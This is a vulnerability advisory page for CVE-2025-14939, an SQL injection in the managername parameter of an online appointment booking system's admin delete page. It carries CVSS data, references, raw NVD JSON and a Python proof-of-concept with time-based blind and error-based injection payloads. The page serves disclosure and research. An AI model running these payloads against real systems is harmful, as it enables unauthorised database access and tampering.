CVE-2025-14939

Description

A vulnerability was found in code-projects Online Appointment Booking System 1.0. Impacted is an unknown function of the file /admin/deletemanager.php. The manipulation of the argument managername results in sql injection. The attack may be performed from remote. The exploit has been made public and could be used.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:anisha:online_appointment_booking_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Online Appointment Booking System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-14939 SQL Injection PoC
# Target: code-projects Online Appointment Booking System 1.0
# Endpoint: /admin/deletemanager.php

def exploit_sql_injection(target_url, manager_name):
    """
    Exploit SQL injection in managername parameter
    This PoC demonstrates time-based blind SQL injection
    """
    # Target endpoint
    url = f"{target_url}/admin/deletemanager.php"
    
    # Malicious payload - time-based blind SQL injection
    # Extract database version using SLEEP() function
    payload = f"{manager_name}'; SELECT SLEEP(5)-- "
    
    # Request data
    data = {
        'managername': payload
    }
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Sending malicious payload: {payload}")
    
    try:
        response = requests.post(url, data=data, timeout=10)
        print(f"[+] Request sent successfully")
        print(f"[*] Status code: {response.status_code}")
        return response
    except requests.exceptions.Timeout:
        print("[!] Request timed out - SQL injection successful (database slept)")
        return None
    except Exception as e:
        print(f"[!] Error: {e}")
        return None

def extract_database_info(target_url):
    """
    Extract database version and current database name
    """
    url = f"{target_url}/admin/deletemanager.php"
    
    # Database version extraction payload
    version_payload = "admin' AND (SELECT * FROM (SELECT SLEEP(3))a)-- "
    
    # Current database name extraction
    dbname_payload = "admin' AND EXTRACTVALUE(1,CONCAT(0x7e,DATABASE()))-- "
    
    print(f"[*] Extracting database information...")
    return {
        'version': version_payload,
        'database': dbname_payload
    }

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <manager_name>")
        print(f"Example: python {sys.argv[0]} http://localhost admin")
        sys.exit(1)
    
    target = sys.argv[1]
    manager = sys.argv[2]
    exploit_sql_injection(target, manager)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14939
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14939
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14939/
[4] VulDB https://vuldb.com/cve/CVE-2025-14939
[5] https://code-projects.org/
[6] https://github.com/wegitlab/cve/issues/1
[7] https://vuldb.com/?ctiid.337519
[8] https://vuldb.com/?id.337519
[9] https://vuldb.com/?submit.715796

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14939", "sourceIdentifier": "[email protected]", "published": "2025-12-19T04:16:00.773", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in code-projects Online Appointment Booking System 1.0. Impacted is an unknown function of the file /admin/deletemanager.php. The manipulation of the argument managername results in sql injection. The attack may be performed from remote. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anisha:online_appointment_booking_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D6EB16F-BF85-4639-AC86-299805A376E3"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/wegitlab/cve/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.337519", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337519", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.715796", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}